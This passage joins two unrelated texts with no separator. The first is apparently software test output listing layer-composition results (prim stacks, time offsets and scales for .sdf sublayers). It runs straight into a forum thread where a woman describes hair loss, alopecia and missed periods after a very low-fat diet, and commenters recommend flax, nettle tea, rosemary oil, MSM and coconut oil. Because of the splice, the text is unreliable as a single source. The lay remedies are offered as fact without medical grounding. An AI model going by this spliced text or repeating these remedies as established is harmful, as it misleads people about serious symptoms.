scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, 
scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=60.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=60.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=90.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=90.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS2> Prim Stack: ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref 
ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS2 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=50.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=50.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=50.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=50.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=40.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=40.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=40.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=40.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer 
(offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS1> Prim Stack: ss.sdf /SS1 ss.sdf /SS1 ss.sdf /SS1 ss.sdf /SS1 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS1 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, 
scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=60.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=60.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=90.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=90.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </S4> Prim Stack: s_12fps.sdf /S4 Time Offsets: root.sdf /S4 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S3> Prim Stack: s_24tcps_12fps.sdf /S3 Time Offsets: root.sdf /S3 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, 
scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S2> Prim Stack: s_48tcps.sdf /S2 Time Offsets: root.sdf /S2 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S1> Prim Stack: s.sdf /S1 Time Offsets: root.sdf /S1 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </Root> Prim Stack: root.sdf /Root Time Offsets: root.sdf /Root root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf 
sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00)
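The offset/scale pairs in the output above compose as layers nest: scales multiply and offsets accumulate through the parent's mapping (for example, s.sdf enters at (offset=10.00, scale=2.00) under root.sdf, and its ss.sdf sublayer is then reported at the cumulative (offset=30.00, scale=4.00)). Below is a minimal Python sketch of that arithmetic, assuming a layer offset maps an inner time t to (scale * t + offset) and that ss.sdf's local offset inside s.sdf is (10.00, 2.00); that local value is inferred from the cumulative numbers and is not stated directly in the output.

# Sketch only: reproduces the composed offsets reported in the test output above.
# Assumptions: a layer offset maps an inner time t to (scale * t + offset), and
# nesting applies the outer (parent) mapping after the inner (child) mapping.
def compose(outer, inner):
    """Compose (offset, scale) pairs; `outer` wraps `inner`."""
    o1, s1 = outer
    o2, s2 = inner
    return (o1 + s1 * o2, s1 * s2)

root_to_s = (10.0, 2.0)  # s.sdf sublayer under root.sdf, taken from the output
s_to_ss = (10.0, 2.0)    # hypothetical local offset of ss.sdf inside s.sdf
print(compose(root_to_s, s_to_ss))  # (30.0, 4.0), matching "ss.sdf sublayer (offset=30.00, scale=4.00)"

The same composition rule accounts for the other cumulative entries, with the local offset and scale differing per layer (for instance, the frame-rate variants contribute different scale factors).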
null
minipile
NaturalLanguage
mit
null
Fitness effects of a deletion mutation increasing transcription of the 6-phosphogluconate dehydrogenase gene in Escherichia coli. Directed evolution in microbial organisms provides an experimental approach to molecular evolution in which selective forces can be controlled and favorable mutations analyzed at the molecular level. Here we present an analysis of a mutation selected in Escherichia coli in response to growth in a chemostat in which the limiting nutrient was gluconate. The selectively favored mutation, designated gnd+ (862), occurred in the gene gnd coding for 6-phosphogluconate dehydrogenase, used in gluconate metabolism. Although the allele is strongly favored in chemostats in which the limiting nutrient is gluconate, the selective effects of gnd+ (862) are highly dependent on growth conditions. In chemostats in which growth is limited by a mixture of gluconate and either ribose, glucose, or succinate, the gnd+ (862) allele is favored, disfavored, or neutral according to the relative concentrations of the substrates. The gnd+ (862) allele results from a deletion of 385 nucleotide pairs in the region 5' to the promoter of gnd, and one endpoint of the deletion is contiguous with the terminus of an IS5 insertion sequence located near gnd in E. coli K12. The gnd+ (862) allele shows a marked increase in transcription that accounts for most or all of the increased enzyme activity.
null
minipile
NaturalLanguage
mit
null
If Apple obeys the FBI’s order, it would set a dangerous precedent for the future, briefs claim. Thirty-two of the world’s largest internet, social media, and technology companies have united behind Apple, as the Cupertino-based tech giant fights the FBI’s demands to unlock the phone of Syed Farook, one of the San Bernardino shooters. The companies filed two separate amicus briefs yesterday (March 3) in the United States District Court for the Central District of California, where Apple is challenging a court order to comply with the FBI’s demands. Parties not directly involved in a court case, known as “amicus curiae,” or “friend of the court,” file these briefs to offer unsolicited additional information to a court, in the hope of influencing a case’s outcome. The two new filings join a long list of law professors, civil liberties activists, and consumer groups supporting Apple in the case. Both of the briefs denounce the government’s use of the All Writs Act to demand that Apple develop a special “master key” software version of its operating system that can bypass existing security measures, and ultimately grant authorities access to Farook’s phone. The 227-year-old law empowers courts to issue orders to third parties when no other specific statute applies. It has been used in the past to compel telecommunications companies to install wiretaps or record phone conversations. If Apple obeys the FBI’s order, it would set a dangerous precedent for the future, both briefs claim. Law enforcement agencies of all types could demand tech companies provide access to private user data. More worryingly, governments abroad could demand Apple do the same. Make no mistake: If the government prevails in this case, it will seek many such decisions. The government’s motion reassures this Court and the public that the request here is a one-time-only hack. But there are already strong indications that law enforcement will ask for broad authority under the All Writs Act on facts far different from the terrorism investigation at hand. For example, FBI Director James Comey just days ago told the House Judiciary Committee that this Court’s decision will be “potentially precedential” in other cases involving similar technology. Manhattan District Attorney Cyrus Vance, Jr., likewise told journalists that he “[a]bsolutely” would seek access to all locked phones linked to criminal proceedings if the government’s theory were to prevail here. That is exactly why this Court should reject any case-specific arguments the government makes here. Investigative tools meant for extraordinary cases may become standard in ordinary ones. As one court has already observed, “[n]othing in the government’s arguments suggests any principled limit on how far a court may go.” A 31-page brief, submitted by Amazon, Box, Cisco, Dropbox, Evernote, Facebook, Google, Microsoft, Mozilla, Nest, Pinterest, Slack, Snapchat, WhatsApp, and Yahoo, also denounces the invocation of the All Writs Act. The companies argue that Congress, not the judiciary, should decide when the act is implemented. The brief reads: In light of rapidly evolving technology and its tremendous social benefits, Congress is better suited to confront the issues here. And indeed, Congress has already grappled with these issues on many occasions—leading to a comprehensive legislative scheme for regulating investigative methods. Intel and AT&T are among the companies that have independently submitted similar briefs to the court. On Thursday (Mar.
3), Apple formally filed an appeal against the court order. As the case goes forward, the US government will be fighting not just Apple, but the entire US tech industry.
null
minipile
NaturalLanguage
mit
null
pause pause compensatory pause the period following a premature ventricular contraction, which causes the R-R cycles of the premature and normal beats to equal the length of two normal beats when added together. pause (pawz), Temporary stop. [G. pausis, cessation] pause (pawz) an interruption or rest. compensatory pause the pause in impulse generation after an extrasystole, either full if the sinus node is not reset or incomplete or noncompensatory if the node is reset and the cycle length is disrupted. sinus pause a transient interruption in the sinus rhythm, of a duration that is not an exact multiple of the normal cardiac cycle. pause (pawz) Temporary stop. [G. pausis, cessation] pause an interruption, or rest. compensatory pause the pause after a premature ventricular systole, related to blockage of one beat of the basic pacemaker of the heart. This ruling should give pause to people--especially to health care providers--who seek to hide misdeeds from public view by diverting them to arbitration," said John Vail of the Center for Constitutional Litigation (CCL) in Washington, D. The plan suggests the soon to be independent ISP is readying an altogether more aggressive content strategy as a means to realize new revenue opportunities, and should give pause for thought to erstwhile potential content partners such as QXL Ltd, the online auction specialist which rumor has it plans to be the UK's second big . The saga of "the lost convoy," which meandered through ambush after ambush, taking heavy casualties, before returning to the base, should give pause to those who believe that perfect "situational awareness" will sweep away the fog of war. This fact, as much as anything else, should give pause to the North American foundry industry, which has long suffered at the hands of suppliers from different industries that have simply out-marketed metalcasting and its traditional products. Also in closing, this book can provide insightful and objective observations to those of us who do work in the field of alcohol and drug treatment, and give pause for reflection on our own interactions with clients. This extraordinary, well-reasoned and data-filled call for avoiding a military strike on Iran and the civilian casualties therefrom should give pause to anyone contemplating military strikes," said Amos Jordan, former CEO of the Center for Strategic and International Studies, and Brigadier General, U.
null
minipile
NaturalLanguage
mit
null
beautiful hair I used to have very thick, shiny, wavy hair. I was on a heavy SAD diet and then drastically changed my eating habbits pretty much overnight and lost about 25 lbs. For about two years I cut out fat entirely from my diet and for the past 3 years have also stopped menstruating. My hair is now thin and dull. Since I have very low estrogen and do not get my period I think this has attributed to my hair. I know estrogen has a strong impact on hair. 2 years ago I also developed Alopecia. It makes me so sad, I miss my beautiful hair and I don’t know how to fix it! I have uped my fat intake and tried maca for about 3 months but nothing has worked. Any advice? Comments Try to eat a lot of flax and flaxoil, avocado, sprouted grains and other sprouts, carrots, beets, cucumbers. These are all very good for the hair. Try to rinse it with ACV mixed in some water, you may add some rosemary essential oil to it. It is very good for the hair, rosemary stimulates hair growth. Nettle tea is also fantastic for hair growth. I’ve read that it’s not good to lose your period. Not to raise alarm, but it might the hair and period loss might be a sign that you’re not getting enough fat – women need fat. When you lose your period it’s because your body thinks there’s a drought, putting non vital systems to rest in order to save energy and resorces for vital ones. I agree that more fat like avocados, nuts etc should be added, like Flybaby writes. fats are good and so important. i suggest flax, flax, flax as well as sunflower seeds and pumpkin seeds. we all need these essential fatty acids for our health. chia seeds, almonds and walnuts are great too! The hair is the last area on your body to get nutrition. So if you aren’t getting enough for the whole body, the hair isn’t going to get any. Yes, get those fats in! I would suggest to start taking some MSM too – very good for the hair. Also, what sort of shampoo and conditioner do you use if any? Please consider switching to more natural ways to clean your hair (check out our Shampoo or not to shampoo thread in this forum – it is pretty long but lots of us here are having success with this method). The reason I suggest this is because your hair is in a very malnutritive and fragile state right now and you need it to be strong to get growing back again. Other things to eat for your hair are cucumbers. Start doing scalp massages too – be gentle since you have hair loss. You want to get the blood flowing up your scalp so your follicles get some much needed nutrition. For the fats, I would recommended eating the avocadoes and also coconut oil. Woman who use coconut oil have the most beautiful hair. Eat it and massage a bit 